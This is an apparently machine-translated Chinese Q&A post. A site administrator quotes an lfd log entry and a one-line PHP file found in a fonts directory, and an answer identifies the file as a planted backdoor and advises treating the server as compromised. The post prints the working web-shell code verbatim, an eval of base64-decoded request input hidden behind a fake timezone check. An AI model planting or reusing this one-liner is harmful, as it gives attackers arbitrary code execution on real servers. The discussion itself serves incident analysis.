可能重复:
我如何处理受损的服务器?
检查lfd.log并注意到脚本的块日志:
Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php 它看起来像脚本试图执行/ usr / bin / php,但是当我看到的代码,这是一个简单的单行文件
<?php function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
任何人都有类似的经验,有没有办法看到什么是造成/ usr / bin / php的调用? 日志说这个脚本是通过POST调用的。
有人在这个目录中放置了一个攻击脚本。 如果您的PHPconfiguration中的eval没有被停用,这将允许攻击者执行与请求一起发送的任意PHP代码。
脚本通过一个简单的HTTP POST请求被调用。
您应该考虑您的系统受到攻击,并尝试了解攻击者如何设置此脚本。